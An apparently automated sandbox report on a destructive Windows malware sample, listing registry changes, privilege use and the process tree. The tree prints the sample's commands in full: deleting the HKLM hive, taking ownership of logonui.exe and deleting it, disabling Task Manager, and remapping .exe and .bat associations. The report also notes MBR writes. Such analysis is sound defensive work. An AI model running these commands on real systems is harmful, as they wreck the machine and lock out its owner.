Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4116"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.413909"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "11.538098"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132895758573128525"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3964"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "24.997920"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe

Modifies registry class 64 IoCs

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.protocol\outlookmail	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\MSOLAP130ErrorLookup\CurVer	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{03C85CD9-D760-3AA8-94BD-F774407391CB}\4.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.8\Protocol\StdFileEditing\SetDataFormats	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.xlsm\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AcroExch.Document.DC\shell\Print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{30590073-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ABFA087C-F703-4D53-946E-37FF82B2C994}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4CAC6328-B9B0-11D3-8D59-0050048384E3}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CEBC3BC2-7399-4C7B-A36B-279FF36E0D15}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{f836fa0a-770d-5e8f-8664-01c43f959eea}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{5BDEA783-9D3A-32F3-AF4F-CE1B471B550E}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AdobeAcrobat.OpenDocuments.2\CurVer	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CABFolder\Shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0002E16B-0000-0000-C000-000000000046}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WECAPI5.FpwUser\CurVer	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{63740092-EF1C-4097-8147-D3E7C7A0BE98}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CC5D8DBD-791C-305C-8BDA-44AF17B301E1}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{F680A48A-2D6C-33F1-AFF7-6273B785B035}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VLC.rar\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{12BA069D-0FC6-4577-97C6-5DF634CE6E84}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0F7F24C1-74D9-4EA6-A3EA-7EDB2D81441D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1B261B22-AC6A-4E68-A870-AB5080E8687B}\DataFormats\GetSet\5	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shell\find	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.TemplateMacroEnabled.12	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ppsx\ShellEx\PropertyHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{10072CEC-8CC1-11D1-986E-00A0C955B42E}\VersionIndependentProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0AAEDF0B-D333-4B27-A0C6-BBF31413A42E}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.SlideShowMacroEnabled.12\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.OpenDocumentPresentation	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VLC.3g2\shell\PlayWithVLC\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excel.Backup\shell\ViewProtected\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C3AEB2FCAE628F23AAB933F1E743AB79	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BA35B84E-A623-471B-8B09-6D72DD072F25}\1.6\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B8526372-3E87-3232-B6B5-3E5B10E11239}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.library-ms	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3050F241-98B5-11CF-BB82-00AA00BDCE0B}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excel.CSV\shell\Print\ddeexec	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4B16D732-E6D2-4E17-9020-24C2490FC3F5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.acrobatsecuritysettings\OpenWithList\AcroRd32.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.cda	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00024500-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VBScript Author\OLEScript	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\wdpfile\shell\printto\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020811-0000-0000-C000-000000000046}\AuxUserType\3	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excel.SheetMacroEnabled.12\shell\Edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{DD79733B-5E46-49C9-8400-6BCF316EC79E}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{EE965595-853A-331B-9CD0-D53DCCE3B6F8}\4.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.wma\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.x3f	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{6AF6E882-A139-3B8E-9B1C-3315A1AF366D}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{DC28ED70-ABB0-41A1-B45E-73D98203B3B5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00020905-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.TemplateMacroEnabled.12\Protocol\StdFileEditing\RequestDataFormats	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9203C2CB-1DC1-482D-967E-597AFF270F0D}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excel.Chart.8\Protocol\StdFileEditing\SetDataFormats	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excel.Template	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\RegisterControl.Register\CurVer	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2052 reg.exe
2940 reg.exe

pid	process
2052	reg.exe
2940	reg.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

takeown.exetakeown.exeTiWorker.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	2356	takeown.exe
Token: SeTakeOwnershipPrivilege	4088	takeown.exe
Token: SeSecurityPrivilege	3496	TiWorker.exe
Token: SeRestorePrivilege	3496	TiWorker.exe
Token: SeBackupPrivilege	3496	TiWorker.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2072 wrote to memory of 2076	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2076	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2076	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2896	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2896	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2896	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2872	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2872	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 2872	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 1804	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 1804	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 1804	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2872 wrote to memory of 2052	2872	cmd.exe	reg.exe
PID 2872 wrote to memory of 2052	2872	cmd.exe	reg.exe
PID 2872 wrote to memory of 2052	2872	cmd.exe	reg.exe
PID 2076 wrote to memory of 2940	2076	cmd.exe	reg.exe
PID 2076 wrote to memory of 2940	2076	cmd.exe	reg.exe
PID 2076 wrote to memory of 2940	2076	cmd.exe	reg.exe
PID 2896 wrote to memory of 2356	2896	cmd.exe	takeown.exe
PID 2896 wrote to memory of 2356	2896	cmd.exe	takeown.exe
PID 2896 wrote to memory of 2356	2896	cmd.exe	takeown.exe
PID 1804 wrote to memory of 4088	1804	cmd.exe	takeown.exe
PID 1804 wrote to memory of 4088	1804	cmd.exe	takeown.exe
PID 1804 wrote to memory of 4088	1804	cmd.exe	takeown.exe
PID 2072 wrote to memory of 3128	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 3128	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 3128	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 740	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 740	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 740	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 3128 wrote to memory of 2724	3128	cmd.exe	icacls.exe
PID 3128 wrote to memory of 2724	3128	cmd.exe	icacls.exe
PID 3128 wrote to memory of 2724	3128	cmd.exe	icacls.exe
PID 740 wrote to memory of 3032	740	cmd.exe	icacls.exe
PID 740 wrote to memory of 3032	740	cmd.exe	icacls.exe
PID 740 wrote to memory of 3032	740	cmd.exe	icacls.exe
PID 2072 wrote to memory of 3400	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 3400	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 3400	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 60	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 60	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe
PID 2072 wrote to memory of 60	2072	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe
"C:\Users\Admin\AppData\Local\Temp\82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /F %WINDIR%\system32\dllcache\logonui.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2896

C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\dllcache\logonui.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKLM /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\SysWOW64\reg.exe
reg delete HKLM /f
3⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Modifies registry key
PID:2940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /F %WINDIR%\system32\logonui.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\logonui.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:2052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls %WINDIR%\system32\dllcache\logonui.exe /Grant:r %UserName% :F
2⤵
- Suspicious use of WriteProcessMemory
PID:3128

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\system32\dllcache\logonui.exe /Grant:r Admin :F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls %WINDIR%\system32\logonui.exe /Grant:r %UserName% :F
2⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\system32\logonui.exe /Grant:r Admin :F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\WINDOWS\system32\dllcache\logonui.exe /s/q
2⤵
PID:3400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\WINDOWS\system32\logonui.exe /s/q
2⤵
PID:60

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c assoc .exe=.html
2⤵
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c assoc .bat=.html
2⤵
PID:1320

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
PID:3736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2400

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3496